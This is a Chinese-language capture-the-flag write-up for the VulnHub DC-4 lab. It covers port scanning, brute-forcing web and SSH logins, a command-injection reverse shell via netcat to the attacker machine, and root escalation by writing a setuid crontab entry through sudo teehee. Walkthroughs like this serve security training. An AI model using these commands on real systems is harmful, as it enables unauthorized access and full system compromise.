综合实战第二章-DC-4


综合实战第二章

DC-4

环境准备

靶场下载:https://www.vulnhub.com/?page=2&q=dc

攻击机:kali 192.168.3.134

靶机:DC-4 192.168.3.165

信息搜集

继续用nmap

nmap -p- -A 192.168.3.165

image-20220430163245962

开放了22和80端口

访问80端口

image-20220430163313598

打开burpsuite

burpsuite

抓包进行暴力破解

破解出账号是admin,密码是happy

登录进去之后发现

image-20220501085824442

可能会有命令执行漏洞,抓包看看

image-20220501090058821

命令执行成功

image-20220501090124147

连接

知道了命令执行漏洞之后,可以构造nc连接语句

nc+192.168.3.134+9999+-e+/bin/bash

另一边

nc -lvvp 9999

image-20220501090427070

成功进入

image-20220501090450661

提权

进入之后剩下的就是提权了

先美化一下命令行

python -c 'import pty;pty.spawn("/bin/bash")'

进入home界面看有啥

cd /home
ls

image-20220501090810537

挨个进入里面看看,发现jim文件夹里面有东西

image-20220501090915307

有个test.sh

image-20220501091048300

没啥东西

进入backups目录

发现里面有个备份文件

image-20220501091142948

查看里面是一些密码

把它拷贝出来

使用hydra爆破密码

hydra -l jim -P password.txt 192.168.3.165 ssh

image-20220501091905818

出来了,连接测试

ssh jim@192.168.3.165

查看一下mbox

image-20220501092053971

啥也不是!

/var/mail中找到一封jim的邮件

查看一下

image-20220501092310756

密码直接告诉你了

直接登录

su charles

进入charles用户里之后

sudo -l

image-20220501092559434

发现这个teehee有root权限

构造命令

sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/sh

ctrl+c退出

查看 /bin/sh

ls -la /bin/sh

image-20220501093023940

可以直接用了

/bin/sh
whoami
cd /root
ls
cat flag.txt

image-20220501093128577

完美,结束!


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录